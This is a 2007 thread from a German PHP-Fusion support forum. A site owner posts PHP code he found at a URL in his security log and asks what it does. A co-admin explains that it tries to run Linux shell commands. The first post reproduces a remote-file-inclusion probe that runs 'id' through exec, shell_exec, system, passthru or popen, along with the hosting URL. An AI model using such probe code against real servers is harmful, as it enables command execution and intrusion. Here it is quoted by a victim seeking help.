BS-Fusion Deutschland

Sicherheit für das Portal

Surftips
BS-Fusion Deutschland - Diskussionsforum
Benutzername
Passwort

Thema ansehen
BS-Fusion Deutschland > Support - Eigene Infusionen
->> Security System
Vorheriges Thema Nächstes Thema

search
Autor Hackversuch   1  # 5  top
Gelöschter User
Eingetragen am 15.11.2007 18:31
Moin zusammen.
Habe ja ( wem auch immer sei Dank) das Secure auf unserer HP www.sgs-torfteufel.de .
Habe mir mal so eine Adresse aus dem Logfile (welches reichlich gefüllt ist) kopiert und bin auf die Seite gegangen http://www.madinaedu.gov.sa/safeon.txt??. Folgendes prangte dort :
( Ich weiss, dass es sich um auführbaren Code handeln muss - weiss aber mangels PHP-Kenntnisse nicht was er bewirken soll. Vielleicht kann mir das einer von Euch verraten ???)

******Es folgt jetzt der Text der auf dieser Page zu sehen ist

<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec'){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'){
$res = @shell_exec($cfe);
}
elseif(function_exists('system'){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

********** Ende Text
 
Autor RE: Hackversuch   2  # 5  top
Gelöschter User
Eingetragen am 19.11.2007 19:28
Danke slaughter.
So ganz befriedigend ist die Antwort dennoch nicht.
Ich weiss immer noch nicht was es denn bewirkt, was nach deiner Meinung keinen Schaden anrichten kann.
 
Autor RE: Hackversuch   3  # 5  top
gozoc
Co-Admin u. Cheftester


User Avatar



Beiträge: 1047

Ort: Bayern
Eingetreten: 22.09.06
Status: Offline
Eingetragen am 19.11.2007 22:20
Die Befehle exec und shell_exec (als Beispiel) sind Versuche direkt auf Linux Befehle der Kommandozeile zu wirken ...
was aber bei den meisten, vernünftig eingestellten Linux Servern so nicht möglich ist.
http://www.wuschelkiste.de/fusion/  
Autor RE: Hackversuch   4  # 5  top
Gelöschter User
Eingetragen am 19.11.2007 22:26
Danke gozoc.
Danke slaughter.
Thread kann geschlossen werden
 
Springe zu Forum:
Ähnliche Themen wie "Hackversuch" [5]
Thema Forum Antworten Letzter Beitrag
anzeige der hackversuche Security System 7 01.12.2009 22:33 von
Hackversuch Teil 3 Security System 6 31.10.2008 00:08 von
Hackversuche Teil2 Security System 8 16.09.2008 19:53 von
Hackversuch Fragen Security System 2 28.03.2007 16:04 von
Hackversuch Security System 1 28.09.2006 22:43 von Silvermoon
Thema verlinken
URL:
BB-Code:
HTML: